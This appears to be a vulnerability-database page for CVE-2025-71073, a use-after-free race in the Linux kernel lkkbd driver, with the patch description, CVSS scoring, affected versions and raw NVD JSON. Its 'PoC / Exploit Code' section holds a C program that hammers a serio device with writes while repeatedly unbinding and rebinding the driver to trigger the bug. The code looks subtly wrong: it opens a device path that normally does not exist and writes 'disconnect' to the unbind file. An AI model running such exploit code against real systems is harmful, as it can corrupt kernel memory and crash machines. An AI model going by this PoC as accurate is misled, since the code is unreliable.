Security Vulnerability Report
CVE-2025-71073 CVSS 7.8 HIGH

CVE-2025-71073

Published: 2026-01-13 16:16:07
Last Modified: 2026-03-25 19:10:53
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

Input: lkkbd - disable pending work before freeing device

lkkbd_interrupt() schedules lk->tq via schedule_work(), and the work handler lkkbd_reinit() dereferences the lkkbd structure and its serio/input_dev fields.

lkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd structure without preventing the reinit work from being queued again until serio_close() returns. This can allow the work handler to run after the structure has been freed, leading to a potential use-after-free.

Use disable_work_sync() instead of cancel_work_sync() to ensure the reinit work cannot be re-queued, and call it both in lkkbd_disconnect() and in lkkbd_connect() error paths after serio_open().

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

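cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 2.6.12.1 up to, but excluding, 6.12.64) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.13 up to, but excluding, 6.18.3) - VULNERABLE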
cpe:2.3:o:linux:linux_kernel:2.6.12:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:2.6.12:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel (lkkbd driver) - Multiple versions prior to patch commit 3a7cd1397c209076c371d53bf39a55c138f62342
Affected commits: 3a7cd1397c209076c371d53bf39a55c138f62342, cffc4e29b1e2d44ab094cf142d7c461ff09b9104, e58c88f0cb2d8ed89de78f6f17409d29cfab6c5c

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-71073 PoC - Race condition trigger
// Compile: gcc -o poc poc.c
// Run with root privileges
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <pthread.h>

#define LKKBD_DEVICE "/dev/serio/serio0" // Adjust based on system

volatile int trigger_race = 1;

void* interrupt_trigger(void* arg) {
    // Simulate rapid interrupt triggering
    int fd = open(LKKBD_DEVICE, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return NULL;
    }
    while (trigger_race) {
        // Trigger keyboard interrupt data
        unsigned char data = 0x01;
        write(fd, &data, 1);
        usleep(100); // Small delay to schedule work
    }
    close(fd);
    return NULL;
}

void* connect_disconnect_race(void* arg) {
    // Rapidly connect/disconnect to trigger race condition
    while (trigger_race) {
        // This would normally be done via hotplug
        // Simulating the disconnect path that frees the structure
        system("echo -n disconnect > /sys/bus/serio/devices/serio0/driver/unbind 2>/dev/null");
        usleep(500);
        system("echo -n serio0 > /sys/bus/serio/drivers/serio/bind 2>/dev/null");
        usleep(500);
    }
    return NULL;
}

int main() {
    pthread_t t1, t2;

    printf("[*] CVE-2025-71073 PoC - lkkbd use-after-free\n");
    printf("[*] This demonstrates the race condition\n");

    // Create threads to trigger race
    pthread_create(&t1, NULL, interrupt_trigger, NULL);
    pthread_create(&t2, NULL, connect_disconnect_race, NULL);

    // Let it run for a while
    sleep(10);
    trigger_race = 0;

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    printf("[*] Test completed - check dmesg for use-after-free warnings\n");
    return 0;
}

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71073", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:06.743", "lastModified": "2026-03-25T19:10:52.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: lkkbd - disable pending work before freeing device\n\nlkkbd_interrupt() schedules lk->tq via schedule_work(), and the work\nhandler lkkbd_reinit() dereferences the lkkbd structure and its\nserio/input_dev fields.\n\nlkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd\nstructure without preventing the reinit work from being queued again\nuntil serio_close() returns. This can allow the work handler to run\nafter the structure has been freed, leading to a potential use-after-free.\n\nUse disable_work_sync() instead of cancel_work_sync() to ensure the\nreinit work cannot be re-queued, and call it both in lkkbd_disconnect()\nand in lkkbd_connect() error paths after serio_open()."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nInput: lkkbd - deshabilitar el trabajo pendiente antes de liberar el dispositivo\n\nlkkbd_interrupt() programa lk-&gt;tq a través de schedule_work(), y el manejador de trabajo lkkbd_reinit() desreferencia la estructura lkkbd y sus campos serio/input_dev.\n\nlkkbd_disconnect() y las rutas de error en lkkbd_connect() liberan la estructura lkkbd sin evitar que el trabajo de reinicio sea encolado de nuevo hasta que serio_close() retorne. 
Esto puede permitir que el manejador de trabajo se ejecute después de que la estructura haya sido liberada, lo que lleva a un potencial uso después de liberación.\n\nUsar disable_work_sync() en lugar de cancel_work_sync() para asegurar que el trabajo de reinicio no pueda ser reencolado, y llamarlo tanto en lkkbd_disconnect() como en las rutas de error de lkkbd_connect() después de serio_open()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.12.1", "versionEndExcluding": "6.12.64", "matchCriteriaId": "34C17A5E-8110-44F4-8B61-A38020E57DEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:-:*:*:*:*:*:*", "matchCriteriaId": "6F62EECE-8FB1-4D57-85D8-CB9E23CF313C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:*", "matchCriteriaId": "4F76C298-81DC-43E4-8FC9-DC005A2116EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc3:*:*:*:*:*:*", "matchCriteriaId": "0AB349B2-3F78-4197-882B-90ADB3BF645A"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "matchCriteriaId": "6AC88830-A9BC-4607-B572-A4B502FC9FD0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "matchCriteriaId": "476CB3A5-D022-4F13-AAEF-CB6A5785516A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": ... (truncated)